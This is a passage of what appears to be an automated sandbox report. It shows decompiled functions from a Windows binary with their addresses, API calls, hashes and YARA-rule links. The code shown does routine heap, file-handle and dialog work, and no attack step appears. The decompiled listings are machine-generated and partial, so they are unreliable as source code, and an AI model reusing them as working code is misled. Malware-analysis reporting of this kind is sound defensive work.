				E00D7137D(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E00D71E9E(_t62 - 0x7d24, _t57, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_t50 = _t62 - 0x7d24;
					_t33 = E00D7192E(_t57, _t62 - 0x24);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E00D92B53(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E00D8EA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E00D715E3(_t62 - 0x24);
					E00D7162D(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E00D7162D(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}
















              0x00d89eef
              0x00d89eef
              0x00d89eef
              0x00d89ef4
              0x00d89ef9
              0x00d89eff
              0x00d89f05
              0x00d89f06
              0x00d89f09
              0x00d89f13
              0x00d89f16
              0x00d89f24
              0x00d89f28
              0x00d89f33
              0x00d89f44
              0x00d89f47
              0x00d89f4a
              0x00d89f4d
              0x00d89f50
              0x00d89f56
              0x00d89f5b
              0x00d89f61
              0x00d89f66
              0x00d89f68
              0x00d89f6a
              0x00d89f6d
              0x00d89f73
              0x00d89f7a
              0x00d89f7f
              0x00d89f81
              0x00d89f83
              0x00d89f89
              0x00d89f8c
              0x00d89f94
              0x00d89f85
              0x00d89f85
              0x00d89f85
              0x00d89f9f
              0x00d89f9f
              0x00d89fa4
              0x00d89faf
              0x00d89fb4
              0x00d89f35
              0x00d89f3b
              0x00d89f40
              0x00d89f40
              0x00d89fbb
              0x00d89fc6

              APIs
              • __EH_prolog.LIBCMT ref: 00D89EF4
                • Part of subcall function 00D7137D: __EH_prolog.LIBCMT ref: 00D71382
                • Part of subcall function 00D7137D: new.LIBCMT ref: 00D713FA
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: ca2dd95c8535cb7cc52d6dcb91360b690a82403c5cf3a36fcaa3adbb1b962d43
              • Instruction ID: 9bf691a73ca54907f2c6a1d03b871c93fd755f9325f6e0fdb0effac5f5743fdd
              • Opcode Fuzzy Hash: ca2dd95c8535cb7cc52d6dcb91360b690a82403c5cf3a36fcaa3adbb1b962d43
              • Instruction Fuzzy Hash: FE216B75D042499ACF14EFA9C9919FEB7F4EF19304F0441AAE909A7242E735AE05CB70
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7910B, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E00D7910B(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E00D8D870(E00DA1321, _t42);
				E00D76ED7(_t42 - 0x20, E00D77C3C());
				_push( *((intOrPtr*)(_t42 - 0x1c)));
				_push( *((intOrPtr*)(_t42 - 0x20)));
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E00D7C70F();
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E00D7C8C7( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_push( *((intOrPtr*)(_t42 - 0x1c)));
						_push( *((intOrPtr*)(_t42 - 0x20)));
						_t40 = E00D7C70F();
					} while (_t40 > 0);
				}
				_t21 = E00D7159C(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}











              0x00d7910b
              0x00d79110
              0x00d79122
              0x00d79127
              0x00d7912d
              0x00d79130
              0x00d79139
              0x00d7913d
              0x00d79140
              0x00d79144
              0x00d79147
              0x00d79147
              0x00d79149
              0x00d7914a
              0x00d7914c
              0x00d79154
              0x00d79154
              0x00d79158
              0x00d79161
              0x00d79168
              0x00d79169
              0x00d7916b
              0x00d7916b
              0x00d7916d
              0x00d79173
              0x00d7917b
              0x00d7917d
              0x00d79182
              0x00d79186
              0x00d7918f
              0x00d79199

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: dc6bfaec3f7de1e6d20533fedec4a34e99039c661dca217a4613cdb6d16941e8
              • Instruction ID: d374bc802dec2ba3d34b71b9f2b1786aff958a6528f7fec86e7ee97deb8dac12
              • Opcode Fuzzy Hash: dc6bfaec3f7de1e6d20533fedec4a34e99039c661dca217a4613cdb6d16941e8
              • Instruction Fuzzy Hash: F2118277D105299BCF16AB98CC529EEB736EF48750F458125FC1867252EB348D148BB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8C6FF, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E00D8C6FF(void* __ecx, void* __eflags) {
				void* __ebx;
				intOrPtr _t18;
				char _t19;
				char _t20;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t37;
				void* _t43;
				intOrPtr _t45;

				_t26 = __ecx;
				E00D8D870(E00DA1520, _t43);
				_push(_t26);
				E00D8D940();
				_push(_t24);
				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
				E00D94D7E(0xdc39fa, "X");
				E00D7FB08(0xdc5a1c, _t37, 0xda22e0);
				E00D94D7E(0xdc4a1a,  *((intOrPtr*)(_t43 + 0xc)));
				E00D75A9F(0xdbb708, _t37,  *((intOrPtr*)(_t43 + 0xc)));
				_t4 = _t43 - 4;
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t18 = 2;
				 *0xdc29d8 = _t18;
				 *0xdc29d4 = _t18;
				 *0xdc29d0 = _t18;
				_t19 =  *0xdb75d4; // 0x0
				 *0xdc185b = _t19;
				_t20 =  *0xdb75d5; // 0x1
				 *0xdc1894 = 1;
				 *0xdc1897 = 1;
				 *0xdc185c = _t20;
				E00D77ADF(_t43 - 0x2108, _t37,  *_t4, 0xdbb708);
				 *(_t43 - 4) = 1;
				E00D77C55(_t43 - 0x2108, _t37,  *_t4);
				_t23 = E00D77B71(_t24, _t43 - 0x2108, _t37); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t23;
			}













              0x00d8c6ff
              0x00d8c704
              0x00d8c709
              0x00d8c70f
              0x00d8c714
              0x00d8c717
              0x00d8c724
              0x00d8c735
              0x00d8c742
              0x00d8c753
              0x00d8c758
              0x00d8c758
              0x00d8c764
              0x00d8c765
              0x00d8c76a
              0x00d8c76f
              0x00d8c774
              0x00d8c779
              0x00d8c77e
              0x00d8c784
              0x00d8c78b
              0x00d8c792
              0x00d8c797
              0x00d8c7a2
              0x00d8c7a6
              0x00d8c7b1
              0x00d8c7bb
              0x00d8c7c6

              APIs
              • __EH_prolog.LIBCMT ref: 00D8C704
                • Part of subcall function 00D77ADF: __EH_prolog.LIBCMT ref: 00D77AE4
                • Part of subcall function 00D77ADF: new.LIBCMT ref: 00D77B28
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 2e619e5e48cc3791811d938826dacc63d0fe2fbb3866374d91b5ff03a9615035
              • Instruction ID: 7f5a094b43ad7dc1381f25f1138889a44bcb445222202b72c979ccdf38625795
              • Opcode Fuzzy Hash: 2e619e5e48cc3791811d938826dacc63d0fe2fbb3866374d91b5ff03a9615035
              • Instruction Fuzzy Hash: 94119875549355AED705EB68A802FEC7FA4DB66310F00409EF40897393DFB11685DB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D97A8A, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E00D97A8A(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00D97ECC())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xdd0874, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00D97906();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00D96763(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}









              0x00d97a8a
              0x00d97a90
              0x00d97a96
              0x00d97ac8
              0x00d97acd
              0x00d97ad3
              0x00000000
              0x00d97ad3
              0x00d97a9a
              0x00d97a9c
              0x00d97a9c
              0x00d97ab3
              0x00d97abc
              0x00d97ac4
              0x00000000
              0x00000000
              0x00d97aa4
              0x00d97aa6
              0x00000000
              0x00000000
              0x00d97aa9
              0x00d97aae
              0x00d97aaf
              0x00d97ab1
              0x00000000
              0x00000000
              0x00d97ab1
              0x00000000

              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D92FA6,?,0000015D,?,?,?,?,00D94482,000000FF,00000000,?,?), ref: 00D97ABC
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: afa4aad0c9102938c3f5c691e9f1f9739628919c8dcc85641359998172da7fa6
              • Instruction ID: a34d2196e0940ad7a92db573f1cb8025262e478a2bf52db90472fb14bfbf2d52
              • Opcode Fuzzy Hash: afa4aad0c9102938c3f5c691e9f1f9739628919c8dcc85641359998172da7fa6
              • Instruction Fuzzy Hash: 45E06D2566D2267AEF2136659D01B5E3A89EB517B1F1D0122EC5C961D0CB20CE0082F9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D75A1D, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
              Download Yara Rule
              C-Code - Quality: 94%
              			E00D75A1D(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E00D8D870(E00DA1216, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E00D7AD1B(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E00D7FAE6();
				 *(_t36 - 4) = 1;
				E00D7FAE6();
				 *(_t36 - 4) = 2;
				E00D7FAE6();
				 *(_t36 - 4) = 3;
				E00D7FAE6();
				 *(_t36 - 4) = 4;
				E00D7FAE6();
				 *(_t36 - 4) = 5;
				E00D75C12(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}






              0x00d75a1d
              0x00d75a22
              0x00d75a27
              0x00d75a29
              0x00d75a2b
              0x00d75a2e
              0x00d75a33
              0x00d75a33
              0x00d75a3d
              0x00d75a48
              0x00d75a4c
              0x00d75a57
              0x00d75a5b
              0x00d75a66
              0x00d75a6a
              0x00d75a75
              0x00d75a79
              0x00d75a80
              0x00d75a84
              0x00d75a8f
              0x00d75a99

              APIs
              • __EH_prolog.LIBCMT ref: 00D75A22
                • Part of subcall function 00D7AD1B: __EH_prolog.LIBCMT ref: 00D7AD20
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 97f362130f8e634ead33c0456bd030463a884d8367db762917854c940d9246bd
              • Instruction ID: 83862e3121f2a96b91766d7571d62aa387a7ed1aa82a323fddc97f0a0064bdee
              • Opcode Fuzzy Hash: 97f362130f8e634ead33c0456bd030463a884d8367db762917854c940d9246bd
              • Instruction Fuzzy Hash: 7F018174919644DAD725E7A8C1067EEB7A4DF16310F00859DE44D53382EBB82B04D773
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D794DA, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
              Download Yara Rule
              C-Code - Quality: 89%
              			E00D794DA(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 4) != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
				}
				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
					E00D76C7B(0xdb00e0, _t21 + 0x1e);
				}
				return _t16;
			}





              0x00d794dc
              0x00d794de
              0x00d794e4
              0x00d794ea
              0x00d794fb
              0x00d79500
              0x00d79502
              0x00d79502
              0x00d79504
              0x00d79504
              0x00d79508
              0x00d7950e
              0x00d7951e
              0x00d7951e
              0x00d79527

              APIs
              • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00D794AA), ref: 00D794F5
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 9b22c1bf940b3d9302718f5dded08378040f08b41dad4dcea6cfcd6161aa5868
              • Instruction ID: 59d57881eb3a7318d23054025e0c2fd2471ab1fafe5d39e55e794f67605cf655
              • Opcode Fuzzy Hash: 9b22c1bf940b3d9302718f5dded08378040f08b41dad4dcea6cfcd6161aa5868
              • Instruction Fuzzy Hash: 2CF05EB1442B248EDB318A288559792F7E89B12735F08CB1E90EB435E0E371A84D8B20
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7A1B1, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D7A1B1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t12;
				intOrPtr _t20;

				_t20 = _a8;
				 *((char*)(_t20 + 0x1044)) = 0;
				if(E00D7B5E5(_a4) == 0) {
					_t12 = E00D7A2DF(__edx, 0xffffffff, _a4, _t20);
					if(_t12 == 0xffffffff) {
						goto L1;
					}
					FindClose(_t12); // executed
					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
					 *((char*)(_t20 + 0x100c)) = E00D79ECD( *((intOrPtr*)(_t20 + 0x1008)));
					 *((char*)(_t20 + 0x100d)) = E00D79EE5( *((intOrPtr*)(_t20 + 0x1008)));
					return 1;
				}
				L1:
				return 0;
			}





              0x00d7a1b2
              0x00d7a1ba
              0x00d7a1c8
              0x00d7a1d5
              0x00d7a1dd
              0x00000000
              0x00000000
              0x00d7a1e0
              0x00d7a1ec
              0x00d7a1fe
              0x00d7a209
              0x00000000
              0x00d7a20f
              0x00d7a1ca
              0x00000000

              APIs
              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D7A1E0
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseFind
              • String ID:
              • API String ID: 1863332320-0
              • Opcode ID: 10de5dadc35ef7eaf9a1d3c926cbcaa588f5eb1f46d481858a0688ac2d7fc7ab
              • Instruction ID: 64be4809e7d56c1932dfda419fb8a87eb1c9b686512c1490212fc85a2481461c
              • Opcode Fuzzy Hash: 10de5dadc35ef7eaf9a1d3c926cbcaa588f5eb1f46d481858a0688ac2d7fc7ab
              • Instruction Fuzzy Hash: 35F0E232009380AACA229BB88800BCBBB91AF56331F04CE0EF4FD12192D6765085D732
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D802E8, Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
              Download Yara Rule
              C-Code - Quality: 75%
              			E00D802E8() {
				void* __esi;
				void* _t2;

				E00D80FAF(); // executed
				_t2 = E00D80FB4();
				if(_t2 != 0) {
					_t2 = E00D76CC9(_t2, 0xdb00e0, 0xff, 0xff);
				}
				if( *0xdb00eb != 0) {
					_t2 = E00D76CC9(_t2, 0xdb00e0, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}





              0x00d802ea
              0x00d802ef
              0x00d80300
              0x00d80305
              0x00d80305
              0x00d80311
              0x00d80316
              0x00d80316
              0x00d8031d
              0x00d80325

              APIs
              • SetThreadExecutionState.KERNEL32 ref: 00D8031D
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ExecutionStateThread
              • String ID:
              • API String ID: 2211380416-0
              • Opcode ID: 3544cdf641d0f2041ce3e4739a82c62a589ad95486dc06f9366a2e41057324ee
              • Instruction ID: 23381c1f9e0826473e4013bbef3f1ffb597c8d8723c1efff8ffdb1fa2b86837e
              • Opcode Fuzzy Hash: 3544cdf641d0f2041ce3e4739a82c62a589ad95486dc06f9366a2e41057324ee
              • Instruction Fuzzy Hash: 2AD05B11A0565053DB62732869557FF1E0ACFC6751F0D806AB24A663C3EA554C8E93B1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D895CF, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E00D895CF(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L00D8D7F6();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00D8938E(__eax, _a4, _a8); // executed
				return _t6;
			}





              0x00d895d2
              0x00d895d3
              0x00d895d5
              0x00d895da
              0x00d895df
              0x00000000
              0x00d895f0
              0x00d895e9
              0x00000000

              APIs
              • GdipAlloc.GDIPLUS(00000010), ref: 00D895D5
                • Part of subcall function 00D8938E: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D893AF
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Gdip$AllocBitmapCreateFromStream
              • String ID:
              • API String ID: 1915507550-0
              • Opcode ID: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
              • Instruction ID: 48e8b005e35a05a93e9408b184a5d7575b9d480ffeb6e4f7de6c0da0d6ba8432
              • Opcode Fuzzy Hash: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
              • Instruction Fuzzy Hash: 15D0A73020410D7BDF51BA759C12E7EFB99DB00310F084065BC85C5581FD71DD10A3B1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D79745, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D79745(void* __ecx) {
				long _t3;

				if( *(__ecx + 4) != 0xffffffff) {
					_t3 = GetFileType( *(__ecx + 4)); // executed
					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}




              0x00d79749
              0x00d79751
              0x00d7975a
              0x00d79767
              0x00d79761
              0x00d79763
              0x00d79763
              0x00d7974b
              0x00d7974d
              0x00d7974d

              APIs
              • GetFileType.KERNELBASE(000000FF,00D79683), ref: 00D79751
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 5dc4665d5434a87b7e3b80713da9c60c4181a420b28220108088cf5eb43fc4ef
              • Instruction ID: 4640e739c4cbb303d394c69f08763ed329749da775ae6793c0bbf716d3228f3d
              • Opcode Fuzzy Hash: 5dc4665d5434a87b7e3b80713da9c60c4181a420b28220108088cf5eb43fc4ef
              • Instruction Fuzzy Hash: 8ED0123203130095CF391E384E1A065A6559F4336673CC6A4D029C40B1E722C803F520
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8C9FE, Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D8C9FE(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xdb75c8, 0x6a, 0x402, E00D7F749(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E00D8A388(); // executed
				return _t7;
			}




              0x00d8ca23
              0x00d8ca29
              0x00d8ca2e

              APIs
              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00D8CA23
                • Part of subcall function 00D8A388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D8A399
                • Part of subcall function 00D8A388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D8A3AA
                • Part of subcall function 00D8A388: IsDialogMessageW.USER32(000F01D2,?), ref: 00D8A3BE
                • Part of subcall function 00D8A388: TranslateMessage.USER32(?), ref: 00D8A3CC
                • Part of subcall function 00D8A388: DispatchMessageW.USER32(?), ref: 00D8A3D6
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Message$DialogDispatchItemPeekSendTranslate
              • String ID:
              • API String ID: 897784432-0
              • Opcode ID: 59955cf2aed2312b2067f03f592cef0dbe63f4141a0a632d0a9ca84c9096cc92
              • Instruction ID: ebdad68ca09d7d2a4cbd2997e816986a00ccf2aa0c144e521ead49828b3c3624
              • Opcode Fuzzy Hash: 59955cf2aed2312b2067f03f592cef0dbe63f4141a0a632d0a9ca84c9096cc92
              • Instruction Fuzzy Hash: 21D09E35144300BAD7112BA1CE06F1A7AF2EF8CB04F004554B245740B1C6629D209B32
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8D1DD, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00D8D1DD() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
